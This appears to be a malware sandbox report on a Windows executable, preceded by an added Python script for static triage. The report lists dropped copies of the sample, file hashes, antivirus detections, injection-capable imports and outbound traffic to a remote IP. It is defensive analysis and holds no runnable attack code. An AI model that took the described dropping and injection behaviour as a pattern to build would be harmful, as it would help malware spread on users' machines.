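The per-file fields above (MD5/SHA-1/SHA-256/SHA-512, 8-bit entropy, the Encrypted flag, and the section names visible in each Preview such as `.tad`, `.lux` or `.civujo`) can be reproduced offline from the dropped files. The script below is an added example for this report, not Joe Sandbox code or part of the original page. Its entropy threshold of 7.9, its allow-list of "normal" section names, and the minimal PE32 image it builds for testing are assumptions chosen for illustration; the sandbox's actual Encrypted rule is not documented here.

```python
"""Static triage of a dropped PE: digests, 8-bit Shannon entropy, section names.

Added example, not Joe Sandbox code. The entropy threshold and the allow-list
of section names are assumptions chosen for illustration.
"""
import hashlib
import math
import struct
from collections import Counter

# Assumption: bytes with entropy at or above this are treated as packed/encrypted.
# Joe Sandbox's own "Encrypted" rule is not documented on the report page.
ENTROPY_ENCRYPTED_THRESHOLD = 7.9

# Assumption: a small allow-list of section names mainstream linkers emit.
# Anything else (e.g. ".tad", ".civujo") is worth a second look as a packer artefact.
KNOWN_SECTIONS = {
    ".text", ".rdata", ".data", ".rsrc", ".reloc", ".idata", ".edata",
    ".pdata", ".tls", ".bss", ".didata", ".CRT", ".gfids", "code",
}


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: 0.0 for constant input, 8.0 for a uniform byte distribution."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def digests(data: bytes) -> dict:
    """Upper-case hex digests in the same four algorithms the report lists."""
    return {name: hashlib.new(name, data).hexdigest().upper()
            for name in ("md5", "sha1", "sha256", "sha512")}


def pe_sections(data: bytes) -> list:
    """Section names from the PE section table; empty list if the headers are not a PE image."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return []
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return []
    # COFF header: NumberOfSections at +6, SizeOfOptionalHeader at +20.
    (num_sections,) = struct.unpack_from("<H", data, e_lfanew + 6)
    (opt_size,) = struct.unpack_from("<H", data, e_lfanew + 20)
    table = e_lfanew + 24 + opt_size
    names = []
    for i in range(num_sections):
        raw = data[table + 40 * i: table + 40 * i + 8]
        if len(raw) < 8:  # truncated section table
            break
        names.append(raw.rstrip(b"\0").decode("latin-1"))
    return names


def triage(data: bytes, threshold: float = ENTROPY_ENCRYPTED_THRESHOLD) -> dict:
    """Reproduce the per-file fields of the report plus a list of unusual section names."""
    ent = shannon_entropy(data)
    sections = pe_sections(data)
    return {
        "size": len(data),
        "entropy": round(ent, 6),
        "encrypted": ent >= threshold,
        **digests(data),
        "sections": sections,
        "unusual_sections": [s for s in sections if s not in KNOWN_SECTIONS],
    }


def build_sample_pe(section_names, payload: bytes) -> bytes:
    """Constructed minimal PE32 image for offline testing (not a real dropped file)."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)          # e_lfanew: PE header follows the DOS header
    opt_size = 0xE0                                    # PE32 optional header size
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(section_names), 0, 0, 0, opt_size, 0x102)
    optional = b"\x0b\x01" + bytes(opt_size - 2)       # Magic 0x10B (PE32), remainder zeroed
    headers_len = len(dos) + len(coff) + opt_size + 40 * len(section_names)
    table = b""
    for i, name in enumerate(section_names):
        table += name.encode("ascii").ljust(8, b"\0")
        table += struct.pack("<IIIIIIHHI", len(payload), 0x1000 * (i + 1),
                             len(payload), headers_len, 0, 0, 0, 0, 0x60000020)
    return bytes(dos) + coff + optional + table + payload


if __name__ == "__main__":
    sample = build_sample_pe([".text", ".data", ".civujo", ".rsrc"], bytes(range(256)) * 4)
    for key, value in triage(sample).items():
        print(f"{key}: {value}")
```

Run it against any of the dropped files with `triage(open(path, "rb").read())` to compare the digests with the ones listed above; a high entropy value alone only says the bytes are compressed or encrypted, so the section-name check is the cheaper first hint that a custom packer rather than a stock linker produced the image.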
                                                                                                            C:\Users\user\AppData\Local\Temp\bzxmernq.exe
                                                                                                            Process:C:\Users\user\AppData\Local\Temp\F4CF.exe
                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):13996032
                                                                                                            Entropy (8bit):3.7880507743534038
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24576:++6Vg1VGTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTL:r1n
                                                                                                            MD5:19D1F6C45BAA1FAB9256C4AA8ECCA231
                                                                                                            SHA1:E32408B2B06F13F48D9BA597BD53CCD3ED57CE68
                                                                                                            SHA-256:5DD26C035DB298110EE036225F2041DD52B863F9B8A8DDEDD6D23093E7DBBEFA
                                                                                                            SHA-512:C08B4A2744D73B0BAB93A71B135934E4FCF5B850A6AE8524C08C8119FEF35016AD604D5B38AA0BA75A2E437125F2B88BCDF8A649214723954DBED59D3C6CA43B
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                            Reputation:unknown
                                                                                                            Preview: MZ/DOS stub ("This program cannot be run in DOS mode"), Rich header, PE32 header; sections: .text, .data, .gemuta, .yid, .yofuyiz, .rsrc, .reloc
                                                                                                            C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl.0001 (copy)
                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):65536
                                                                                                            Entropy (8bit):0.11022541052871243
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:26uXm/Ey6q9995ahq3qQ10nMCldimE8eawHjcxRH:267l68vLyMCldzE9BHjcxR
                                                                                                            MD5:E125A0B0D33FEA7326D8F39DDADEDBE4
                                                                                                            SHA1:D74F3115620849008B523785B5A106C57A51F949
                                                                                                            SHA-256:F6E52C6DFAEB03E2D0AF3A4C41111580BB9783D7E9B8D5AF75644E84CD429D1D
                                                                                                            SHA-512:479D5119E66E51345436BB6311D342A36039961A7A37129BE6AF9E23EDA33F42C1EAAB2DCAC3A01B33F8A473BA2C773AA8F840D88AF6B9D1FD19EADAED0719CE
                                                                                                            Malicious:false
                                                                                                            Reputation:unknown
                                                                                                            Preview: ETL trace header; recoverable UTF-16 strings: @tzres.dll,-212, @tzres.dll,-211, logger name SyncVerbose, log file path C:\Users\hardz\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl
                                                                                                            C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl.0001 (copy)
                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):65536
                                                                                                            Entropy (8bit):0.11267307713306338
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:f/lTXm/Ey6q9995abOL1miM3qQ10nMCldimE8eawHza1miIl/:3lKl68k61tMLyMCldzE9BHza1tIl/
                                                                                                            MD5:7B28FA88D1E22EC7DB348008C787F608
                                                                                                            SHA1:8E5BE4EF718FAD2722F84787388AA48A0C010D96
                                                                                                            SHA-256:EA8CA5EE6AD32D729B991484A4E48FE308EDA7D6BC0C6E91FB63D84DF3D7253B
                                                                                                            SHA-512:9CF77D6FA866211F06E4FA296A567D8FE6914DE065F830AD725268FA0D238B20F25040ACBCF5298E340E12ABF3FCA25C84B86AEA055CD9DFB4E88CC6F9A9B82D
                                                                                                            Malicious:false
                                                                                                            Reputation:unknown
                                                                                                            Preview: ETL trace header; recoverable UTF-16 strings: @tzres.dll,-212, @tzres.dll,-211, logger name UnistackCircular, log file path C:\Users\hardz\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl
                                                                                                            C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl.0001O (copy)
                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):65536
                                                                                                            Entropy (8bit):0.11272810934557069
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:AuTXm/Ey6q9995ajL1mK2P3qQ10nMCldimE8eawHza1mKRP/:/Kl68QL1iPLyMCldzE9BHza11/
                                                                                                            MD5:C6EE22D81C57583D05F2D3770AA07F2F
                                                                                                            SHA1:EDD0CF3C45CCDC26681C28B1512DC7AE4C291CA3
                                                                                                            SHA-256:AC595BDD3D34C82BB67344DC1143EEF8CC6D1D049C6A2F4A25EC7F78EE0BF03E
                                                                                                            SHA-512:2E8BCB7CFA7ACB98047ECDF6401B40FC930562E3EE09D4623C59570DCFBA905A01384338A8EA268C2643A9ED4C70B648EAE83B2F8FB66A8C6192B25EF1C4787F
                                                                                                            Malicious:false
                                                                                                            Reputation:unknown
                                                                                                            Preview: ETL trace header; recoverable UTF-16 strings: @tzres.dll,-212, @tzres.dll,-211, logger name UnistackCritical, log file path C:\Users\hardz\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl
                                                                                                            C:\Users\user\AppData\Roaming\iscgwer
                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):320000
                                                                                                            Entropy (8bit):6.687125826295423
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6144:+WbLfFa4xe0ga5Pvt8Cta8wm/jso47Qtgi5aR8vuz+sGfeqK:+SFes5PvHtayQoDtgpR8vuy6
                                                                                                            MD5:4E806C42B23B043FA7409D108EECAADB
                                                                                                            SHA1:39D29853690F371FB690D427D34EACE3946B6553
                                                                                                            SHA-256:847FD5A4CAE442AFC596F09B8A8F2DE13BC85356DCD8B897A3B4A89081F5046F
                                                                                                            SHA-512:24DA5692EE3AFBBC71D62CBBAC33BB094E326E0FA3F234C580C7A994F1C47A768AD1579F9652BF2B7174541C0E447BBD5952F8457F3CBC3B4BD9613B165D7332
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                            Reputation:unknown
                                                                                                            Preview: MZ/DOS stub ("This program cannot be run in DOS mode"), Rich header, PE32 header; sections: .text, .data, .tad, .lux, .civujo, .rsrc, .reloc
                                                                                                            C:\Users\user\AppData\Roaming\iscgwer:Zone.Identifier
                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):26
                                                                                                            Entropy (8bit):3.95006375643621
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:ggPYV:rPYV
                                                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                            Malicious:true
                                                                                                            Reputation:unknown
                                                                                                            Preview: [ZoneTransfer]....ZoneId=0
                                                                                                            C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log
                                                                                                            Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                            File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
                                                                                                            Category:modified
                                                                                                            Size (bytes):9062
                                                                                                            Entropy (8bit):3.163844099475939
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:cY+38+DJl+ibJ6+ioJJ+i3N+WtT+E9tD+Ett3d+E3zg+b:j+s+v+b+P+m+0+Q+q+3+b
                                                                                                            MD5:B5DE6DD84C98809EF316370957DAFC67
                                                                                                            SHA1:77B67A0D1C9330A407DF002E7379F6D18CA80B1A
                                                                                                            SHA-256:CDAF524879DD680A9371DD50A89837DED2D5E354468EDBFDEE62FB5CB75EC16C
                                                                                                            SHA-512:D9E65B73D9EE9245318B340EF9862AD9355480107D33537F89342C2B1B92A04EC4B256269E767915D535664DEBDA98A24120AD43CDEA0700BCC8DFE0CFED4C38
                                                                                                            Malicious:false
                                                                                                            Reputation:unknown
                                                                                                            Preview (decoded UTF-16 text, separator lines of dashes omitted):
                                                                                                            • MpCmdRun: Command Line: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                                                                                                            • Start Time: Thu Jun 27 2019 01:29:49
                                                                                                            • MpEnsureProcessMitigationPolicy: hr = 0x1
                                                                                                            • WDEnable
                                                                                                            • ERROR: MpWDEnable(TRUE) failed (800704EC)
                                                                                                            • MpCmdRun: End Time: Thu Jun 27 2019 01:29:49
                                                                                                            C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\Logs\dosvc.20220114_215814_003.etl
                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):8192
                                                                                                            Entropy (8bit):3.3009477934568885
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:eCHWdj/o+ol5MJ96/YIHCkvI2lHSk+P4klT2YjFzeNMC3dJRW:d2Vgen2ctbCTw
                                                                                                            MD5:79150C3DE7A59F9D91DE45304057AEA2
                                                                                                            SHA1:D04203330C99D91B4726F18611E495829C830F9E
                                                                                                            SHA-256:184C0723489AF3CB59A19B1C8F580CD58C00AEDDBB06EFFAC1BD0D2B2961DA8E
                                                                                                            SHA-512:10B99CBE8C3DF31F63526ED0933A41321EDE3E585967FFD01D0024C662F2E4C0280084D2A472940E8FAC9DA2488EA1C7C7BA25EA8C418246B24A7EDF4BB1043B
                                                                                                            Malicious:false
                                                                                                            Reputation:unknown
                                                                                                            Preview: ETL trace header; recoverable UTF-16 strings: @tzres.dll,-212, @tzres.dll,-211, logger name 8696EAC4-1288-4288-A4EE-49EE431B0AD9, log file path C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\Logs\dosvc.20220114_215814_003.etl
                                                                                                            C:\Windows\SysWOW64\jdijwvkg\bzxmernq.exe (copy)
                                                                                                            Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):13996032
                                                                                                            Entropy (8bit):3.7880507743534038
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24576:++6Vg1VGTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTL:r1n
                                                                                                            MD5:19D1F6C45BAA1FAB9256C4AA8ECCA231
                                                                                                            SHA1:E32408B2B06F13F48D9BA597BD53CCD3ED57CE68
                                                                                                            SHA-256:5DD26C035DB298110EE036225F2041DD52B863F9B8A8DDEDD6D23093E7DBBEFA
                                                                                                            SHA-512:C08B4A2744D73B0BAB93A71B135934E4FCF5B850A6AE8524C08C8119FEF35016AD604D5B38AA0BA75A2E437125F2B88BCDF8A649214723954DBED59D3C6CA43B
                                                                                                            Malicious:false
                                                                                                            Reputation:unknown
                                                                                                            Preview: MZ/DOS stub ("This program cannot be run in DOS mode"), Rich header, PE32 header; sections: .text, .data, .gemuta, .yid, .yofuyiz, .rsrc, .reloc

                                                                                                            Static File Info

                                                                                                            General

                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                            Entropy (8bit):6.687125826295423
                                                                                                            TrID:
                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.83%
                                                                                                            • Windows Screen Saver (13104/52) 0.13%
                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                            File name:9ro85QVN0F.exe
                                                                                                            File size:320000
                                                                                                            MD5:4e806c42b23b043fa7409d108eecaadb
                                                                                                            SHA1:39d29853690f371fb690d427d34eace3946b6553
                                                                                                            SHA256:847fd5a4cae442afc596f09b8a8f2de13bc85356dcd8b897a3b4a89081f5046f
                                                                                                            SHA512:24da5692ee3afbbc71d62cbbac33bb094e326e0fa3f234c580c7a994f1c47a768ad1579f9652bf2b7174541c0e447bbd5952f8457f3cbc3b4bd9613b165d7332
                                                                                                            SSDEEP:6144:+WbLfFa4xe0ga5Pvt8Cta8wm/jso47Qtgi5aR8vuz+sGfeqK:+SFes5PvHtayQoDtgpR8vuy6
                                                                                                            File Content Preview:MZ/DOS stub ("This program cannot be run in DOS mode"), Rich header, PE32 header (preview truncated)

File Icon

Icon Hash: c8d0d8e0f8e0f4e8

Static PE Info

General

Entrypoint: 0x41b690
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics: TERMINAL_SERVER_AWARE
Time Stamp: 0x5F68886D [Mon Sep 21 11:03:09 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 0
File Version Major: 5
File Version Minor: 0
Subsystem Version Major: 5
Subsystem Version Minor: 0
Import Hash: bfce8d99da2229492c7de3a8a6087683

Entrypoint Preview

Instruction
mov edi, edi
push ebp
mov ebp, esp
call 00007FC4F0A5114Bh
call 00007FC4F0A44236h
pop ebp
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
mov edi, edi
push ebp
mov ebp, esp
push FFFFFFFEh
push 0043DC98h
push 0041E870h
mov eax, dword ptr fs:[00000000h]
push eax
add esp, FFFFFF94h
push ebx
push esi
push edi
mov eax, dword ptr [00440354h]
xor dword ptr [ebp-08h], eax
xor eax, ebp
push eax
lea eax, dword ptr [ebp-10h]
mov dword ptr fs:[00000000h], eax
mov dword ptr [ebp-18h], esp
mov dword ptr [ebp-70h], 00000000h
mov dword ptr [ebp-04h], 00000000h
lea eax, dword ptr [ebp-60h]
push eax
call dword ptr [004010A4h]
mov dword ptr [ebp-04h], FFFFFFFEh
jmp 00007FC4F0A44248h
mov eax, 00000001h
ret
mov esp, dword ptr [ebp-18h]
mov dword ptr [ebp-78h], 000000FFh
mov dword ptr [ebp-04h], FFFFFFFEh
mov eax, dword ptr [ebp-78h]
jmp 00007FC4F0A44377h
mov dword ptr [ebp-04h], FFFFFFFEh
call 00007FC4F0A443B4h
mov dword ptr [ebp-6Ch], eax
push 00000001h
call 00007FC4F0A51B3Ah
add esp, 04h
test eax, eax
jne 00007FC4F0A4422Ch
push 0000001Ch
call 00007FC4F0A4436Ch
add esp, 04h
call 00007FC4F0A4D314h
test eax, eax
jne 00007FC4F0A4422Ch
push 00000010h

Rich Headers

Programming Language:
• [ C ] VS2008 build 21022
• [IMP] VS2005 build 50727
• [ASM] VS2008 build 21022
• [LNK] VS2008 build 21022
• [RES] VS2008 build 21022
• [C++] VS2008 build 21022

Data Directories

Name                                   Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT           0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT           0x3e3c4          0x28          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE         0x150000         0x83d0        .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION        0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY         0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC        0x159000         0x1e00        .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG            0x13a0           0x1c          .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT        0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR        0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS              0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG      0x9110           0x40          .text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT     0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT              0x1000           0x348         .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT     0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR   0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED         0x0              0x0

Sections

Name     Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy        Characteristics
.text    0x1000           0x3e756       0x3e800   False     0.58257421875    data       6.96623040888  IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data    0x40000          0x10c988      0x1800    False     0.341145833333   data       3.46431598321  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.tad     0x14d000         0x5           0x200     False     0.02734375       data       0.0            IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.lux     0x14e000         0xea          0x200     False     0.02734375       data       0.0            IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.civujo  0x14f000         0xd93         0xe00     False     0.00697544642857 data       0.0            IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc    0x150000         0x83d0        0x8400    False     0.597212357955   data       5.82312083073  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc   0x159000         0x465c        0x4800    False     0.347927517361   data       3.69266698613  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name                 RVA       Size    Type                                                                              Language  Country
AFX_DIALOG_LAYOUT    0x156ce8  0x2     data                                                                              Dutch     Netherlands
AFX_DIALOG_LAYOUT    0x156ce0  0x2     data                                                                              Dutch     Netherlands
AFX_DIALOG_LAYOUT    0x156cf0  0x2     data                                                                              Dutch     Netherlands
AFX_DIALOG_LAYOUT    0x156cf8  0x2     data                                                                              Dutch     Netherlands
CIDAFICUDUROSOTAROM  0x1565c8  0x6c7   ASCII text, with very long lines, with no line terminators                        Assamese  India
RT_CURSOR            0x156d00  0x8a8   dBase III DBT, version number 0, next free block index 40, 1st item "\251\317"    Dutch     Netherlands
RT_ICON              0x1506e0  0x6c8   data                                                                              Assamese  India
RT_ICON              0x150da8  0x568   GLS_BINARY_LSB_FIRST                                                              Assamese  India
RT_ICON              0x151310  0x10a8  data                                                                              Assamese  India
RT_ICON              0x1523b8  0x988   dBase III DBT, version number 0, next free block index 40                         Assamese  India
RT_ICON              0x152d40  0x468   GLS_BINARY_LSB_FIRST                                                              Assamese  India
RT_ICON              0x1531f8  0x8a8   data                                                                              Assamese  India
RT_ICON              0x153aa0  0x6c8   data                                                                              Assamese  India
RT_ICON              0x154168  0x568   GLS_BINARY_LSB_FIRST                                                              Assamese  India
RT_ICON              0x1546d0  0x10a8  data                                                                              Assamese  India
RT_ICON              0x155778  0x988   data                                                                              Assamese  India
RT_ICON              0x156100  0x468   GLS_BINARY_LSB_FIRST                                                              Assamese  India
RT_STRING            0x1575c0  0xe4    data                                                                              Dutch     Netherlands
RT_STRING            0x1576a8  0x3bc   data                                                                              Dutch     Netherlands
RT_STRING            0x157a68  0x6e6   data                                                                              Dutch     Netherlands
RT_STRING            0x158150  0x1a0   data                                                                              Dutch     Netherlands
RT_STRING            0x1582f0  0xdc    data                                                                              Dutch     Netherlands
RT_ACCELERATOR       0x156ca0  0x10    data                                                                              Dutch     Netherlands
RT_ACCELERATOR       0x156c90  0x10    data                                                                              Dutch     Netherlands
RT_GROUP_CURSOR      0x1575a8  0x14    data                                                                              Dutch     Netherlands
RT_GROUP_ICON        0x1531a8  0x4c    data                                                                              Assamese  India
RT_GROUP_ICON        0x156568  0x5a    data                                                                              Assamese  India
None                 0x156cc0  0xa     data                                                                              Dutch     Netherlands
None                 0x156cd0  0xa     data                                                                              Dutch     Netherlands
None                 0x156cb0  0xa     data                                                                              Dutch     Netherlands

Imports

DLL: KERNEL32.dll
Import: CallNamedPipeW, TerminateProcess, GetExitCodeProcess, DeactivateActCtx, GetVersionExW, SetConsoleCP, GetConsoleAliasesLengthA, GetDefaultCommConfigW, FindFirstFileExW, GetDriveTypeA, FreeEnvironmentStringsA, SetProcessPriorityBoost, SetVolumeMountPointW, GetLongPathNameW, CopyFileA, TlsGetValue, SetConsoleCursorInfo, SetComputerNameExA, SystemTimeToTzSpecificLocalTime, FindAtomA, ReleaseSemaphore, CallNamedPipeA, CreateMailslotA, BuildCommDCBAndTimeoutsW, VirtualProtect, LoadLibraryA, LocalAlloc, TryEnterCriticalSection, GetCommandLineW, InterlockedDecrement, GetCalendarInfoA, DeleteFileA, CreateActCtxW, CreateRemoteThread, SetSystemTimeAdjustment, SetPriorityClass, WritePrivateProfileStringA, GetProcessHeaps, GetProcessHeap, GlobalUnWire, ReadConsoleOutputCharacterW, GetStartupInfoW, GetDiskFreeSpaceExA, GetCPInfoExA, GetWindowsDirectoryW, GetSystemWow64DirectoryW, GetLastError, WriteProfileSectionW, GetProfileStringA, GetConsoleCursorInfo, SetLastError, DeleteVolumeMountPointA, DebugBreak, lstrcmpA, ReadFileScatter, SetConsoleMode, GetVersion, GetSystemWindowsDirectoryW, GlobalFindAtomA, FindCloseChangeNotification, GetTapeParameters, SetMailslotInfo, InterlockedExchange, DefineDosDeviceW, FindVolumeMountPointClose, EndUpdateResourceW, WriteConsoleW, GetSystemTimeAdjustment, WritePrivateProfileSectionA, GetPrivateProfileStructW, GetFileAttributesExA, MoveFileW, GetVolumePathNameA, HeapUnlock, lstrcmpW, SetDefaultCommConfigW, FindActCtxSectionStringA, ResetEvent, GetThreadContext, MoveFileExW, GetProcAddress, GlobalLock, UnregisterWaitEx, BuildCommDCBW, PeekConsoleInputW, GetBinaryTypeW, CreateSemaphoreW, TransmitCommChar, WaitNamedPipeA, GetPrivateProfileSectionNamesW, FindResourceExW, EnumTimeFormatsW, GetLocalTime, CreateSemaphoreA, FreeEnvironmentStringsW, GetPrivateProfileSectionW, GetOverlappedResult, SetFileShortNameW, lstrcpyA, VerLanguageNameW, SetThreadExecutionState, SetSystemTime, LockFile, VerSetConditionMask, GetConsoleAliasA, FlushConsoleInputBuffer, FreeConsole, GetAtomNameW, GetConsoleAliasExesLengthA, WriteConsoleInputW, TransactNamedPipe, EnumDateFormatsA, SetCommState, FileTimeToLocalFileTime, _lopen, GetConsoleAliasExesLengthW, GetWriteWatch, GetModuleHandleW, WriteConsoleOutputCharacterA, GetConsoleMode, HeapFree, OpenMutexA, LocalLock, GetCommMask, SetEndOfFile, FindClose, CreateIoCompletionPort, SetFileApisToANSI, CancelWaitableTimer, GetProcessHandleCount, UnregisterWait, GetConsoleAliasesLengthW, GetProcessVersion, lstrcpynA, SetNamedPipeHandleState, GetCompressedFileSizeA, FindNextVolumeMountPointW, GetFullPathNameA, WriteProfileStringA, DeleteAtom, GlobalAddAtomW, AssignProcessToJobObject, QueryDosDeviceW, InitializeCriticalSection, Process32NextW, SetCurrentDirectoryA, GetBinaryTypeA, MoveFileA, RaiseException, HeapValidate, IsBadReadPtr, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, GetModuleFileNameW, GetModuleHandleA, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, InterlockedIncrement, GetACP, GetOEMCP, GetCPInfo, IsValidCodePage, TlsAlloc, TlsSetValue, GetCurrentThreadId, TlsFree, Sleep, ExitProcess, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, GetEnvironmentStringsW, HeapDestroy, HeapCreate, VirtualFree, GetModuleFileNameA, WriteFile, HeapAlloc, HeapSize, HeapReAlloc, VirtualAlloc, RtlUnwind, InitializeCriticalSectionAndSpinCount, OutputDebugStringA, OutputDebugStringW, LoadLibraryW, MultiByteToWideChar, GetStringTypeA, GetStringTypeW, WideCharToMultiByte, LCMapStringA, LCMapStringW, GetLocaleInfoA, SetFilePointer, GetConsoleCP, FlushFileBuffers, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, CloseHandle, CreateFileA

Possible Origin

Language of compilation system  Country where language is spoken  Map
Dutch                           Netherlands
Assamese                        India

Network Behavior

Network Port Distribution

TCP Packets

Timestamp                            Source Port  Dest Port  Source IP    Dest IP
Jan 14, 2022 13:58:53.549886942 CET  49775        80         192.168.2.3  8.209.70.0
Jan 14, 2022 13:58:53.569924116 CET  80           49775      8.209.70.0   192.168.2.3
Jan 14, 2022 13:58:53.570055008 CET  49775        80         192.168.2.3  8.209.70.0
Jan 14, 2022 13:58:53.570254087 CET  49775        80         192.168.2.3  8.209.70.0
Jan 14, 2022 13:58:53.570290089 CET  49775        80         192.168.2.3  8.209.70.0
Jan 14, 2022 13:58:53.587796926 CET  80           49775      8.209.70.0   192.168.2.3
Jan 14, 2022 13:58:53.693064928 CET  80           49775      8.209.70.0   192.168.2.3
Jan 14, 2022 13:58:53.693109035 CET  80           49775      8.209.70.0   192.168.2.3
Jan 14, 2022 13:58:53.693213940 CET  49775        80         192.168.2.3  8.209.70.0
Jan 14, 2022 13:58:53.694268942 CET  49775        80         192.168.2.3  8.209.70.0
Jan 14, 2022 13:58:53.714025974 CET  80           49775      8.209.70.0   192.168.2.3
Jan 14, 2022 13:58:53.999017954 CET  49776        80         192.168.2.3  8.209.70.0
